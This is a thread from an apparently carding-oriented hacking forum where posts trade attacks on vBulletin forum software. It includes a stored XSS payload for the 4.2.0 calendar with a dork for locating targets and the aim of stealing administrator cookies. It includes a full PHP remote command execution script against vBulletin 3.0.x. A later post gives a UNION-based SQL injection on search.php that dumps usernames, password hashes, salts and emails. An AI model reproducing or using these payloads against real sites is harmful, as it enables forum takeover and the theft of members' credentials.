Sangteamtham/vBulletin 4.2.0 Cross Site Scripting

  • For support and Advertisement ICQ: 481465 Jabber: verifiedcarder@xmpp.jp
M

_Mike74

#1
[FONT=IPAex&#12468][TABLE="width: 1"]
[TR]
[TD="class: code"]$------------------------------------------------------------------------------------------------------------
$ vBulletin 4.2.0 XSS Vulnerability
$ Author : sangteamtham
$ Home : Hcegroup.vn
$ Download: http://members.vbulletin.com/
$ Date :06/13/2012
$ Google Dork: "Powered by vBulletin? Version 4.2.0"
$ Twitter: http://twitter.com/Sangte_amtham
$*************************************************************************************************************
1.vBulletin Description:

Content publishing, search, security, and more— vBulletin has it all.
Whether it’s available features, support, or ease-of-use, vBulletin offers the most for your money.
Learn more about what makes vBulletin the choice for people who are serious about creating
thriving online communities.

2. Vulnerability Description:

To steal cookie from administrator or any member in a forum or drive them to malicious sites, attacker will firstly create an account, then come to
calendar section, and create an event for himself.

In title, he will inject XSS code there. For sample:

"><img src=x onerror=alert(1)>

In content section, he will write everything he likes. Now, he will send his profile to Administrator or any member
and wait for cookie or victims' infection.

http://127.0.0.1/vbb/member.php?id-xyz

3. Patch:

June 13, 2012: Contacted the vendor.
June 14, 2012: Vendor replied me.
June 18, 2012: the vendor released the patch for this vulnerabitily. Please download it from member Area right now.

https://members.vbulletin.com/patches.php

$**************************************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$---------------------------------------------------------------------------------------------------------------

[/TD]
[/TR]
[/TABLE]




vBulletin version 4.2.0 suffers from a persistent cross site scripting vulnerability in the calendar section.[/FONT]

[FONT=IPAex&#12468][h=2]AL3NDALEEB/vbulletin-3.0.4-2.txt ( na)[/h][COLOR=white !important]?
[TABLE="width: 1"]
[TR="bgcolor: #F8F8F8"]
[TD="class: gutter"]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66​
[/TD]
[TD="class: code"]<?php
/**************************************************************
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions['showforumusers'] == True , the admin must set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo['userid'] == 0 , you must be an visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when you
# visit the forums, it must has at least
# one user show the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
#
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
#
**************************************************************/

if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}

if ($argv[3]){
$url = $argv[1];
$forumid = intval($argv[2]);
$command = $argv[3];
}
else {
echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
echo "<forumid> forum id\n";
echo "<command> command to execute on server (ex: 'ls -la')\n";
echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
echo "ex :\n";
echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";

exit;
}

if ($argv[4])
$proxy = $argv[4];



$action = 'forumdisplay.php?GLOBALS[]=1&amp;f='.$forumid.'&amp;comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';

$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.'/'.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$res = substr($res, strpos($res, '_START_')+7);
$res = substr($res,0, strpos($res, '_END_'));
echo $res;


?>

[/TD]
[/TR]
[/TABLE]



[/FONT][/COLOR]
 

sushi007

Premium User
Apr 12, 2016
4
0
0
22
#2
THERE IS ANOTHER HACK OF VBULLETIN 4 (4.0.x,4.1.1,4.1.2)

1. in community section last maked group name
2.copy the name and search it in /search.php
3.open live http header and reply header with this
&cat[0]=1) UNION SELECT concat_ws(0x3a,username,password,salt,em*ail) FROM user limit 1,1#





u got pass username of owner